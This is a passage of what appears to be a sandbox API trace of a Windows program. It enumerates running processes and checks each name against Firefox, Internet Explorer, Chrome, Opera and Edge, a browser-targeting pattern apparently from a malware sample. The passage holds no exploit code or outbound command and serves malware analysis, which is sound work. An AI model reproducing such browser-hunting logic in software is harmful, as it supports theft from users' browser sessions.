Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0217.820] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0217.820] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0217.820] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0217.820] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0217.820] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.820] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.821] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0217.821] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0217.821] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0217.821] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0217.821] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.821] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0217.821] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0217.821] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0217.821] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0217.821] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0217.821] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.821] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.822] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0217.822] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0217.822] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0217.822] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0217.822] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.822] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0217.822] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0217.822] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0217.822] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0217.822] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0217.822] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.822] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0217.823] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0217.823] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0217.823] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0217.823] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0217.823] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.823] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0217.824] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0217.824] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0217.824] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0217.824] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0217.824] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.824] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0217.824] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0217.824] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0217.824] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0217.824] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0217.824] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.824] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.825] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0217.825] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0217.825] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0217.825] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0217.825] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.825] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.825] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0217.825] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0217.825] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0217.825] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0217.825] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.825] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.826] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0217.826] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0217.826] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0217.826] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0217.826] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.826] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.827] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0217.827] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0217.827] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0217.827] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0217.827] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.827] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.827] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0217.827] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0217.827] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0217.827] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0217.827] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.827] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0217.828] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0217.828] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0217.828] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0217.828] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0217.828] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.828] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.828] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0217.828] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0217.828] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0217.828] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0217.828] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.828] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.829] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0217.829] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0217.829] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0217.829] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0217.829] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.829] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0217.829] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0217.829] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0217.830] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0217.830] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0217.830] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.830] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0217.830] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0217.830] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0217.830] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0217.830] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0217.830] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.830] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0217.831] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0217.831] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0217.831] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0217.831] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0217.831] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.831] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.831] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0217.831] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0217.832] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0217.832] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0217.832] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.832] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0217.832] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0217.832] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0217.832] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0217.832] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0217.832] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.832] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0217.833] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0217.833] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0217.833] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0217.833] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0217.833] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.833] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0217.833] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0217.833] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0217.833] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0217.833] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0217.833] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.833] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0217.834] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0217.834] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0217.834] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0217.834] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0217.834] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.834] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0217.834] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0217.834] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0217.835] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0217.835] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0217.835] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.835] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0217.835] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0217.835] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0217.835] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0217.835] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0217.835] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.835] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0217.836] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0217.836] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0217.836] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0217.836] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0217.836] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.836] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0217.836] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0217.836] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0217.836] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0217.836] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0217.836] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.836] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0217.837] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0217.837] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0217.837] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0217.837] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0217.837] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.837] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0217.837] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0217.837] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0217.838] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0217.838] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0217.838] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.838] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0217.838] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0217.838] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0217.838] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0217.838] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0217.838] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.838] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0217.839] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0217.839] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0217.839] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0217.839] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0217.839] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.839] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0217.839] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0217.839] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0217.839] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0217.839] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0217.839] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.839] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0217.840] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0217.840] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0217.840] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0217.840] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0217.840] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.840] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0217.840] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0217.840] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0217.840] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0217.841] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0217.841] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.841] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0217.841] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0217.841] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0217.841] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0217.841] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0217.841] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.841] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0217.842] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0217.842] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0217.842] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0217.842] lstrcmpiA 